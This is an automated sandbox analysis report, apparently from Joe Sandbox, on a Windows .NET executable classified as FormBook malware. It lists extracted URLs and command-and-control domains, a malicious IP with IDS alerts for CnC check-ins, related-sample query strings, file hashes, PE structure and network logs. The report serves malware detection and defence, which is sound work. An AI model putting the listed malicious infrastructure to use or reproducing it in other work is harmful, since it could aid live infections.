                                                                                                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.fontbureau.com/designersGn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.ehills.shop/m25s/www.uy-smart-tv-nl.todayexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.fontbureau.com/designers/?n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.founder.com.cn/cn/bThen0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.39474.clubReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.fontbureau.com/designers?n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000002.4172464480.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.cctofi.cpaReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://powerpoint.office.comcemberexplorer.exe, 00000003.00000002.4180055463.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1738643727.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.cctofi.cpaexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.tiro.comn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.newordforpurpose.info/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.ental-health-69511.bondexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.oches-a-credito-es.bondReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.uy-smart-tv-nl.todayexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    http://www.goodfont.co.krn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.microexplorer.exe, 00000003.00000002.4175505713.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4174803690.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4177373939.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.xewaov.xyzexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://www.typography.netDn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.wistlnc.netReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://www.ehills.shopexplorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://www.galapagosdesign.com/staff/dennis.htmn0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.ental-health-69511.bondReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.vitor.liveReferer:explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://www.onnorbell.design/m25s/explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmpfalse
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://api.msn.com/q
Source: explorer.exe, 00000003.00000003.3107210219.00000000097D4000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000000.1732979117.00000000097D4000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.4176155250.00000000097D4000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.ealthcare-trends-60670.bondReferer:
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: http://www.cctofi.cpa/m25s/
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.orean-course-289113002.zone/m25s/
Source: explorer.exe, 00000003.00000003.3106248158.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000003.3494660185.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.4181885131.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000003.3105521401.000000000CB8E000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: http://www.fonts.com
Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://www.sandoll.co.kr
Source: n0srYVYMDI.exe, 00000000.00000002.1729964064.0000000007462000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000003.00000000.1728291050.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.4172464480.0000000007900000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: high
IP               Domain          Country    ASN     ASN Name                            Malicious
103.224.212.213  www.vitor.live  Australia  133618  TRELLIAN-AS-APTrellianPtyLimitedAU  true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587617
Start date and time: 2025-01-10 15:48:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: n0srYVYMDI.exe (renamed because the original name is a hash value)
Original Sample Name: 067d0a32b11208193e232f3b4d05b24f0d730ffb23049a1611be068738b9d11c.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@8/1@12/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 113
• Number of non-executed functions: 349
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 2.23.242.162, 20.12.23.50, 13.107.246.45
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
09:48:59  API Interceptor  1x Sleep call for process: n0srYVYMDI.exe modified
09:49:00  API Interceptor  6787574x Sleep call for process: explorer.exe modified
09:49:43  API Interceptor  6003094x Sleep call for process: cmd.exe modified
Match  Associated Sample Name / URL  Detection  Threat Name  Context
Match: 103.224.212.213
• Employee performance.exe, malicious, FormBook
  Context: www.warpateam.com/lm31/?IR-4WR=je5vN1uA9yEmYEN49dayIwTCku09UgHsksm87SEwvw14I11Hwk0s9tmois1WiUPsr2unY/WNgA==&vN=I0D4IvR
• 8tvMmyxveyzFcnJ.exe, malicious, FormBook
  Context: www.at89v2.com/mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUh
• tYEY1UeurGz0Mjb.exe, malicious, FormBook
  Context: www.serco2020.com/dy13/?IR=7H41Cx9M/9Klm4wO2KyYkeGFvajkB7bQdwjfmZPzOjV6ZXjzQq6V6P6jcCKZla+kGSS1&nL=S4247TXPfxsLR
• yPURXYpFVuXra2o.exe, malicious, FormBook
  Context: www.bolinkpass.club/cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs
• Ajanlatkeres_2024.05.29.PDF.exe, malicious, FormBook, Lokibot
  Context: www.vivaness.club/dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp
• Solicitud de pedido Documento No 168646080.exe, malicious, FormBook, PureLog Stealer
  Context: www.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX
• DHL Factura Electronica Pendiente documento No 04BB25083.exe, malicious, FormBook, PureLog Stealer
  Context: www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR
• PaDQmSw2ud.dll, malicious, Laplas Clipper
  Context: searchseedphase.online/bot/regex
• PaDQmSw2ud.dll, malicious, Laplas Clipper
  Context: searchseedphase.online/bot/regex
• Documento de confirmacion de orden de compra OC 1580070060.exe, malicious, FormBook
  Context: www.yassa-hany.online/pz08/?mzrPV4R=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVpBqNDhq+c&Rl=8pFP0r98Chvt5p5P
No context
Match  Associated Sample Name / URL  Detection  Threat Name  Context
Match: TRELLIAN-AS-APTrellianPtyLimitedAU
• http://www.jmclmedia.ph, malicious, Unknown
  Context: 103.224.182.206
• NkMMNoILv9.exe, malicious, Unknown
  Context: 103.224.212.212
• http://www.finanzamthessen.de, malicious, Unknown
  Context: 103.224.182.245
• https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdf, malicious, PDFPhish
  Context: 103.224.182.253
• PO1341489LTB GROUP.vbs, malicious, FormBook
  Context: 103.224.182.242
• http://www.firsthealthbp.com, malicious, Unknown
  Context: 103.224.212.254
• PO2412010.exe, malicious, FormBook
  Context: 103.224.182.242
• http://divisioninfo.net/, malicious, Unknown
  Context: 103.224.182.251
• Document_084462.scr.exe, malicious, FormBook, GuLoader
  Context: 103.224.182.242
• Pp7OXMFwqhXKx5Y.exe, malicious, FormBook
  Context: 103.224.182.242
No context
No context
Process: C:\Users\user\Desktop\n0srYVYMDI.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 8B21C0FDF91680677FEFC8890882FD1F
SHA1: E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
SHA-256: E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
SHA-512: 1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
Malicious: true
Reputation: moderate, very likely benign file
                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.710270911108727
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Win16/32 Executable Delphi generic (2074/23) 0.01%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: n0srYVYMDI.exe
File size: 766'464 bytes
MD5: 7d311cdceda373fd94310919b7bdc784
SHA1: 9e1504e3148829775ef7d1c80095dda1fb725e73
SHA256: 067d0a32b11208193e232f3b4d05b24f0d730ffb23049a1611be068738b9d11c
SHA512: d9d8ba2bdc04c32c542e1b26ee538de89d758a4895deb9fe49ff64fcb3e9d9246a02bf160d05aecaeaa7dffd55fd8b5889d7cb2949407058607fa689d4ca513e
SSDEEP: 12288:2FuUyDYcTGfg3IzN6SJ0OSNAwmeU1Lq7LbgpL5hLavGrgjYNvxtSE+nY:t2gqqqNVMA1qXbabLajWon
TLSH: E3F4F11C7A53AE04CB6C9A3BC4632B0C8567D992F026F3FB98D85CE54E72A44C54FD86
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................................@................................
                                                                                                                                          Icon Hash:41a400a4a4000000
                                                                                                                                          Entrypoint:0x4bba1e
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x670700DE [Wed Oct 9 22:17:02 2024 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:4
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:4
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:4
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbb9c8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbc000 | 0x1200 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb9a24 | 0xb9c00 | ab30b3c9266d6c39eb1e6bb4cc257491 | False | 0.8683638437920592 | data | 7.718614846166296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xbc000 | 0x1200 | 0x1200 | 0c4344271a7741e464863f6a2a9e6332 | False | 0.6525607638888888 | data | 6.697180142465721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xbe000 | 0xc | 0x200 | 44e1609da105b9575c7ad24e1c050049 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xbc0c8 | 0xcee | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | - | - | 0.7616314199395771
RT_GROUP_ICON | 0xbcdc8 | 0x14 | data | - | - | 1.05
RT_VERSION | 0xbcdec | 0x36c | data | - | - | 0.4440639269406393
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T15:51:40.551018+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 50007 | 103.224.212.213 | 80 | TCP
2025-01-10T15:51:40.551018+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 50007 | 103.224.212.213 | 80 | TCP
2025-01-10T15:51:40.551018+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 50007 | 103.224.212.213 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 15:51:40.053059101 CET | 50007 | 80 | 192.168.2.4 | 103.224.212.213
Jan 10, 2025 15:51:40.057914019 CET | 80 | 50007 | 103.224.212.213 | 192.168.2.4
Jan 10, 2025 15:51:40.058053970 CET | 50007 | 80 | 192.168.2.4 | 103.224.212.213
Jan 10, 2025 15:51:40.058109999 CET | 50007 | 80 | 192.168.2.4 | 103.224.212.213
Jan 10, 2025 15:51:40.063122988 CET | 80 | 50007 | 103.224.212.213 | 192.168.2.4
Jan 10, 2025 15:51:40.545497894 CET | 50007 | 80 | 192.168.2.4 | 103.224.212.213
Jan 10, 2025 15:51:40.550776958 CET | 80 | 50007 | 103.224.212.213 | 192.168.2.4
Jan 10, 2025 15:51:40.551018000 CET | 50007 | 80 | 192.168.2.4 | 103.224.212.213
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 15:49:37.343482018 CET | 61348 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:49:37.352560043 CET | 53 | 61348 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:49:57.155132055 CET | 60971 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:49:57.164133072 CET | 53 | 60971 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:50:17.717585087 CET | 62538 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:50:17.727824926 CET | 53 | 62538 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:50:37.954613924 CET | 57936 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:50:37.972253084 CET | 53 | 57936 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:50:58.546670914 CET | 58383 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:50:58.558268070 CET | 53 | 58383 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:51:19.265645027 CET | 54004 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:51:19.274790049 CET | 53 | 54004 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:51:39.742948055 CET | 60874 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:51:40.050163984 CET | 53 | 60874 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 15:52:01.263598919 CET | 50556 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 15:52:01.274040937 CET | 53 | 50556 | 1.1.1.1 | 192.168.2.4
